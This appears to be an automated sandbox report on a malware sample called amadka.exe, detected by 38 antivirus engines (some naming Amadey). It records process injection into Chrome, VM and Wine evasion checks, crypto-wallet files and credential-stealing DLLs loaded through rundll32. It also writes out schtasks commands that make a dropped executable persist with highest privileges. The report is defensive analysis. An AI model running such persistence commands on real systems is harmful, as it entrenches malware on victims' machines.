parent_process	chrome.exe				martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef37c6e00,0x7fef37c6e10,0x7fef37c6e20

Appends a known CryptoMix ransomware file extension to files that have been encrypted (2 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet

Resumed a suspended thread in a remote process potentially indicative of process injection (25 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2748 resumed a thread in remote process 2816
Process injection	Process 2904 resumed a thread in remote process 2816
NtResumeThread April 19, 2024, 1:10 p.m.	thread_handle: 0x0000029c suspend_count: 1 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Detects VirtualBox through the presence of a registry key (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 68 93 b5 01 42 89 04 24 exception.symbol: amadka+0x1f6793 exception.instruction: in eax, dx exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2058131 exception.address: 0x12a6793 registers.esp: 4062540 registers.edi: 1114345 registers.eax: 1447909480 registers.ebp: 4007964692 registers.edx: 22104 registers.ebx: 1971327157 registers.esi: 19534644 registers.ecx: 20	1	0	0

Detects the presence of Wine emulator (1 event)

registry

HKEY_CURRENT_USER\Software\Wine

Executed a process and injected code into it, probably while unpacking (50 out of 75 events)

Time & API	Arguments	Status	Return
NtResumeThread April 19, 2024, 1:10 p.m.	thread_handle: 0x000001e4 suspend_count: 1 process_identifier: 1680	1	0
CreateProcessInternalW April 19, 2024, 1:10 p.m.	thread_identifier: 2268 thread_handle: 0x000003e8 process_identifier: 2264 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\09fd851a4f\explorha.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\09fd851a4f\explorha.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\09fd851a4f\explorha.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003f0	1	1
NtResumeThread April 19, 2024, 1:10 p.m.	thread_handle: 0x000001a0 suspend_count: 1 process_identifier: 2264	1	0
CreateProcessInternalW April 19, 2024, 1:10 p.m.	thread_identifier: 2512 thread_handle: 0x00000480 process_identifier: 2508 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000054001\amert.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000054001\amert.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000054001\amert.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000484	1	1
CreateProcessInternalW April 19, 2024, 1:10 p.m.	thread_identifier: 2752 thread_handle: 0x00000468 process_identifier: 2748 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000055001\ce7dc404a0.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000055001\ce7dc404a0.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000055001\ce7dc404a0.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000048c	1	1
CreateProcessInternalW April 19, 2024, 1:10 p.m.	thread_identifier: 3012 thread_handle: 0x00000470 process_identifier: 3008 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000056001\c2e58d8472.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000056001\c2e58d8472.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000056001\c2e58d8472.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000494	1	1
CreateProcessInternalW April 19, 2024, 1:10 p.m.	thread_identifier: 524 thread_handle: 0x00000498 process_identifier: 1572 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\09fd851a4f\explorha.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\09fd851a4f\explorha.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000484	1	1
NtGetContextThread April 19, 2024, 1:10 p.m.	thread_handle: 0x00000498	1	0
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1572 region_size: 5984256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000484		3221225496
CreateProcessInternalW April 19, 2024, 1:10 p.m.	thread_identifier: 2104 thread_handle: 0x000004bc process_identifier: 2100 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\rundll32.exe track: 1 command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main filepath_r: C:\Windows\System32\rundll32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000004d4	1	1
CreateProcessInternalW April 19, 2024, 1:10 p.m.	thread_identifier: 1972 thread_handle: 0x000004c0 process_identifier: 2480 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\rundll32.exe track: 1 command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main filepath_r: C:\Windows\System32\rundll32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000004dc	1	1
NtResumeThread April 19, 2024, 1:10 p.m.	thread_handle: 0x000001e4 suspend_count: 1 process_identifier: 2508	1	0
NtResumeThread April 19, 2024, 1:10 p.m.	thread_handle: 0x00000284 suspend_count: 1 process_identifier: 2748	1	0
CreateProcessInternalW April 19, 2024, 1:10 p.m.	thread_identifier: 2820 thread_handle: 0x0000029c process_identifier: 2816 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002b0	1	1
NtResumeThread April 19, 2024, 1:10 p.m.	thread_handle: 0x0000029c suspend_count: 1 process_identifier: 2816	1	0
NtResumeThread April 19, 2024, 1:10 p.m.	thread_handle: 0x0000000000000078 suspend_count: 1 process_identifier: 2816	1	0
CreateProcessInternalW April 19, 2024, 1:10 p.m.	thread_identifier: 2908 thread_handle: 0x00000000000000c0 process_identifier: 2904 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xb0,0xb4,0xb8,0x84,0xbc,0x7fef37c6e00,0x7fef37c6e10,0x7fef37c6e20 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000000000c4	1	1
CreateProcessInternalW April 19, 2024, 1:11 p.m.	thread_identifier: 1668 thread_handle: 0x0000000000000558 process_identifier: 2068 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1032,15907650265161917128,18348153160346787762,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=840 /prefetch:2 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 17302540 (CREATE_BREAKAWAY_FROM_JOB\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|DETACHED_PROCESS\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000550	1	1
NtResumeThread April 19, 2024, 1:10 p.m.	thread_handle: 0x00000000000000e8 suspend_count: 1 process_identifier: 2904	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0
NtResumeThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118 suspend_count: 2 process_identifier: 2816	1	0
NtGetContextThread April 19, 2024, 1:11 p.m.	thread_handle: 0x0000000000000118	1	0

File has been identified by 38 AntiVirus engines on VirusTotal as malicious (38 events)

Bkav	W32.AIDetectMalware
tehtris	Generic.Malware
Cynet	Malicious (score: 99)
Skyhigh	BehavesLike.Win32.Generic.vh
ALYac	Gen:Variant.Mikey.165603
Cylance	unsafe
VIPRE	Gen:Variant.Mikey.165603
Sangfor	Suspicious.Win32.Save.ins
BitDefender	Gen:Variant.Mikey.165603
Arcabit	Trojan.Mikey.D286E3
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Packed.Themida.HZB
APEX	Malicious
Avast	Win32:Evo-gen [Trj]
Kaspersky	HEUR:Trojan.Win32.Generic
MicroWorld-eScan	Gen:Variant.Mikey.165603
Emsisoft	Gen:Variant.Mikey.165603 (B)
F-Secure	Trojan.TR/Crypt.TPM.Gen
Trapmine	malicious.high.ml.score
FireEye	Generic.mg.f854143c49c4d2fa
Sophos	Mal/Generic-S
Avira	TR/Crypt.TPM.Gen
MAX	malware (ai score=88)
Kingsoft	Win32.HeurC.KVMH008.a
Gridinsoft	Trojan.Heur!.030120A1
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
ZoneAlarm	VHO:Backdoor.Win32.Phpw.gen
GData	Gen:Variant.Mikey.165603
AhnLab-V3	Malware/Win32.Generic.C3976233
BitDefenderTheta	AI:Packer.724D56F71F
DeepInstinct	MALICIOUS
Malwarebytes	Trojan.Amadey
Zoner	Probably Heur.ExeHeaderL
Tencent	Win32.Trojan.Generic.Vdkl
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.300983.susgen
AVG	Win32:Evo-gen [Trj]
alibabacloud	Trojan:Win/Packed.Themida.HOH

amadka.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All